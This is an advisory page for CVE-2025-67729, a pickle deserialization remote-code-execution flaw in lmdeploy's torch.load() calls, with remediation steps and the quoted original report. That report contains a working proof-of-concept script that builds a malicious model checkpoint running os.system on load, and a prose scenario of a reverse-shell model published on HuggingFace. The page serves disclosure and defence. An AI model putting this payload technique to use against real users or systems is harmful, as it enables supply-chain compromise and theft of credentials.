CVE-2025-67729: lmdeploy: Deserialization enables RCE

GHSA-9pf3-7rrr-x5jh HIGH CISA: ATTEND
Published December 26, 2025
CISO Take

Patch lmdeploy to 0.11.1 immediately if your teams use it for model serving or inference. This is a classic pickle deserialization RCE that requires only loading a malicious .bin or .pt model file — a trivially realistic attack given how freely ML teams download models from HuggingFace and ModelScope. Until patched, enforce a policy requiring SafeTensors format (.safetensors) for all model loading in production pipelines.

Risk Assessment

Effective risk is HIGH despite low EPSS (0.00069). The CVSS 8.8 score accurately reflects the impact potential: full RCE with no privileges required on the attacker side, only user interaction (victim loads a file). The attack concept is well-understood and PoC creation is trivial for anyone with Python knowledge. The exposure surface is broad in AI-heavy organizations where engineers routinely pull models from public registries without formal security review. The low EPSS reflects current lack of observed exploitation, not low exploitability.

Affected Systems

Package Ecosystem Vulnerable Range Patched
lmdeploy pip <= 0.11 0.11.1

Do you use lmdeploy? You're affected.

Severity & Risk

CVSS 3.1
8.8 / 10
EPSS
0.1%
chance of exploitation in 30 days
Higher than 29% of all CVEs
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Trivial
Exploitation Confidence
medium
CISA SSVC: Public PoC
Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Attack Surface

AV AC PR UI S C I A
AV Network
AC Low
PR None
UI Required
S Unchanged
C High
I High
A High

Recommended Action

6 steps
  1. PATCH

    Upgrade lmdeploy to 0.11.1 (contains the fix applying weights_only=True consistently).

  2. IMMEDIATE WORKAROUND

    Mandate SafeTensors (.safetensors) format for all model files — the codebase already handles this safely.

  3. POLICY

    Prohibit loading .bin or .pt model files from untrusted sources; implement model provenance verification (hash + source allowlist).

  4. SCANNING

    Deploy tools like ModelScan (HuggingFace) or ProtectAI's model scanner to detect pickle payloads in checkpoint files before loading.

  5. DETECTION

    Monitor for unexpected process spawns, outbound connections, or file writes during model loading operations.

  6. ENVIRONMENT

    Run model loading in sandboxed environments (containers with no network, minimal privileges) as defense-in-depth.

CISA SSVC Assessment

Decision Attend
Exploitation poc
Automatable No
Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Art.9 - Risk management system Article 15 - Accuracy, Robustness and Cybersecurity Article 9 - Risk Management System
ISO 42001
A.6.1 - Policies for responsible development and use of AI systems A.6.2 - AI System Supply Chain Management A.8.2 - Data for Development and Enhancement of AI Systems
NIST AI RMF
GOVERN 6.2 - Organizational risk policies for AI supply chains MANAGE 2.2 - Mechanisms to sustain AI risk management MANAGE-2.2 - Treatment of identified AI risks
OWASP LLM Top 10
LLM05 - Supply Chain Vulnerabilities LLM05:2025 - Improper Output Handling / Supply Chain Vulnerabilities

Frequently Asked Questions

What is CVE-2025-67729?

Patch lmdeploy to 0.11.1 immediately if your teams use it for model serving or inference. This is a classic pickle deserialization RCE that requires only loading a malicious .bin or .pt model file — a trivially realistic attack given how freely ML teams download models from HuggingFace and ModelScope. Until patched, enforce a policy requiring SafeTensors format (.safetensors) for all model loading in production pipelines.

Is CVE-2025-67729 actively exploited?

No confirmed active exploitation of CVE-2025-67729 has been reported, but organizations should still patch proactively.

How to fix CVE-2025-67729?

1. PATCH: Upgrade lmdeploy to 0.11.1 (contains the fix applying weights_only=True consistently). 2. IMMEDIATE WORKAROUND: Mandate SafeTensors (.safetensors) format for all model files — the codebase already handles this safely. 3. POLICY: Prohibit loading .bin or .pt model files from untrusted sources; implement model provenance verification (hash + source allowlist). 4. SCANNING: Deploy tools like ModelScan (HuggingFace) or ProtectAI's model scanner to detect pickle payloads in checkpoint files before loading. 5. DETECTION: Monitor for unexpected process spawns, outbound connections, or file writes during model loading operations. 6. ENVIRONMENT: Run model loading in sandboxed environments (containers with no network, minimal privileges) as defense-in-depth.

What systems are affected by CVE-2025-67729?

This vulnerability affects the following AI/ML architecture patterns: model serving, inference pipelines, training pipelines, MLOps / model evaluation workflows, quantization pipelines.

What is the CVSS score for CVE-2025-67729?

CVE-2025-67729 has a CVSS v3.1 base score of 8.8 (HIGH). The EPSS exploitation probability is 0.11%.

Technical Details

NVD Description

## Summary An insecure deserialization vulnerability exists in lmdeploy where `torch.load()` is called without the `weights_only=True` parameter when loading model checkpoint files. This allows an attacker to execute arbitrary code on the victim's machine when they load a malicious `.bin` or `.pt` model file. **CWE:** CWE-502 - Deserialization of Untrusted Data --- ## Details Several locations in lmdeploy use `torch.load()` without the recommended `weights_only=True` security parameter. PyTorch's `torch.load()` uses Python's pickle module internally, which can execute arbitrary code during deserialization. ### Vulnerable Locations **1. `lmdeploy/vl/model/utils.py` (Line 22)** ```python def load_weight_ckpt(ckpt: str) -> Dict[str, torch.Tensor]: """Load checkpoint.""" if ckpt.endswith('.safetensors'): return load_file(ckpt) # Safe - uses safetensors else: return torch.load(ckpt) # ← VULNERABLE: no weights_only=True ``` **2. `lmdeploy/turbomind/deploy/loader.py` (Line 122)** ```python class PytorchLoader(BaseLoader): def items(self): params = defaultdict(dict) for shard in self.shards: misc = {} tmp = torch.load(shard, map_location='cpu') # ← VULNERABLE ``` **Additional vulnerable locations:** - `lmdeploy/lite/apis/kv_qparams.py:129-130` - `lmdeploy/lite/apis/smooth_quant.py:61` - `lmdeploy/lite/apis/auto_awq.py:101` - `lmdeploy/lite/apis/get_small_sharded_hf.py:41` ### Note: Secure Pattern Already Exists The codebase already uses the secure pattern in one location: ```python # lmdeploy/pytorch/weight_loader/model_weight_loader.py:103 state = torch.load(file, weights_only=True, map_location='cpu') # ✓ Secure ``` This shows the fix is already known and can be applied consistently across the codebase. --- ## PoC ### Step 1: Create a Malicious Checkpoint File Save this as `create_malicious_checkpoint.py`: ```python #!/usr/bin/env python3 """ Creates a malicious PyTorch checkpoint that executes code when loaded. """ import pickle import os class MaliciousPayload: """Executes arbitrary code during pickle deserialization.""" def __init__(self, command): self.command = command def __reduce__(self): # This is called during unpickling - returns (callable, args) return (os.system, (self.command,)) def create_malicious_checkpoint(output_path, command): """Create a malicious checkpoint file.""" malicious_state_dict = { 'model.layer.weight': MaliciousPayload(command), 'config': {'hidden_size': 768} } with open(output_path, 'wb') as f: pickle.dump(malicious_state_dict, f) print(f"[+] Created malicious checkpoint: {output_path}") if __name__ == "__main__": os.makedirs("malicious_model", exist_ok=True) create_malicious_checkpoint( "malicious_model/pytorch_model.bin", "echo '[PoC] Arbitrary code executed! - RCE confirmed'" ) ``` ### Step 2: Load the Malicious File (Simulates lmdeploy's Behavior) Save this as `exploit.py`: ```python #!/usr/bin/env python3 """ Demonstrates the vulnerability by loading the malicious checkpoint. This simulates what happens when lmdeploy loads an untrusted model. """ import pickle def unsafe_load(path): """Simulates torch.load() without weights_only=True.""" # torch.load() uses pickle internally, so this is equivalent with open(path, 'rb') as f: return pickle.load(f) if __name__ == "__main__": print("[*] Loading malicious checkpoint...") print("[*] This simulates: torch.load(ckpt) in lmdeploy") print("-" * 50) result = unsafe_load("malicious_model/pytorch_model.bin") print("-" * 50) print(f"[!] Checkpoint loaded. Keys: {list(result.keys())}") print("[!] If you see the PoC message above, RCE is confirmed!") ``` ### Step 3: Run the PoC ```bash # Create the malicious checkpoint python create_malicious_checkpoint.py # Exploit - triggers code execution python exploit.py ``` ### Expected Output ``` [+] Created malicious checkpoint: malicious_model/pytorch_model.bin [*] Loading malicious checkpoint... [*] This simulates: torch.load(ckpt) in lmdeploy -------------------------------------------------- [PoC] Arbitrary code executed! - RCE confirmed ← Code executed here! -------------------------------------------------- [!] Checkpoint loaded. Keys: ['model.layer.weight', 'config'] [!] If you see the PoC message above, RCE is confirmed! ``` The `[PoC] Arbitrary code executed!` message proves that arbitrary shell commands run during deserialization. --- ## Impact ### Who Is Affected? - **All users** who load PyTorch model files (`.bin`, `.pt`) from untrusted sources - This includes models downloaded from HuggingFace, ModelScope, or shared by third parties ### Attack Scenario 1. Attacker creates a malicious model file (e.g., `pytorch_model.bin`) containing a pickle payload 2. Attacker distributes it as a "fine-tuned model" on model sharing platforms or directly to victims 3. Victim downloads and loads the model using lmdeploy 4. Malicious code executes with the victim's privileges ### Potential Consequences - **Remote Code Execution (RCE)** - Full system compromise - **Data theft** - Access to sensitive files, credentials, API keys - **Lateral movement** - Pivot to other systems in cloud environments - **Cryptomining or ransomware** - Malware deployment --- ## Recommended Fix Add `weights_only=True` to all `torch.load()` calls: ```diff # lmdeploy/vl/model/utils.py:22 - return torch.load(ckpt) + return torch.load(ckpt, weights_only=True) # lmdeploy/turbomind/deploy/loader.py:122 - tmp = torch.load(shard, map_location='cpu') + tmp = torch.load(shard, map_location='cpu', weights_only=True) # Apply the same pattern to: # - lmdeploy/lite/apis/kv_qparams.py:129-130 # - lmdeploy/lite/apis/smooth_quant.py:61 # - lmdeploy/lite/apis/auto_awq.py:101 # - lmdeploy/lite/apis/get_small_sharded_hf.py:41 ``` Alternatively, consider migrating fully to SafeTensors format, which is already supported in the codebase and immune to this vulnerability class. --- ## Resources ### Official PyTorch Security Documentation - **[PyTorch torch.load() Documentation](https://pytorch.org/docs/stable/generated/torch.load.html)** > *"torch.load() uses pickle module implicitly, which is known to be insecure. It is possible to construct malicious pickle data which will execute arbitrary code during unpickling. Never load data that could have come from an untrusted source."* ### Related CVEs | CVE | Description | CVSS | |-----|-------------|------| | [CVE-2025-32434](https://nvd.nist.gov/vuln/detail/CVE-2025-32434) | PyTorch `torch.load()` RCE vulnerability | **9.3 Critical** | | [CVE-2024-5452](https://nvd.nist.gov/vuln/detail/CVE-2024-5452) | PyTorch Lightning insecure deserialization | **8.8 High** | ### Additional Resources - [CWE-502: Deserialization of Untrusted Data](https://cwe.mitre.org/data/definitions/502.html) - [Trail of Bits: Exploiting ML Pickle Files](https://blog.trailofbits.com/2021/03/15/never-a-dill-moment-exploiting-machine-learning-pickle-files/) - [Rapid7: Attackers Weaponizing AI Models](https://www.rapid7.com/blog/post/2024/02/06/attackers-are-weaponizing-ai-model-files/) --- Thank you for your time reviewing this report. I'm happy to provide any additional information or help with testing the fix. Please let me know if you have any questions!

Exploitation Scenario

An adversary creates a malicious 'fine-tuned LLaMA' model by embedding a pickle payload inside a pytorch_model.bin file that executes a reverse shell on deserialization. They publish it to HuggingFace under a convincing namespace (e.g., 'organization-llama3-finetuned-v2'). A data scientist on the target team finds the model via search, pulls it, and loads it with lmdeploy for evaluation. The moment torch.load() is called, the payload executes with the scientist's privileges — in cloud environments this often means access to IAM credentials, S3 buckets, and internal APIs. The attacker now has a foothold in the organization's ML infrastructure.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Timeline

Published
December 26, 2025
Last Modified
December 27, 2025
First Seen
March 24, 2026

Related Vulnerabilities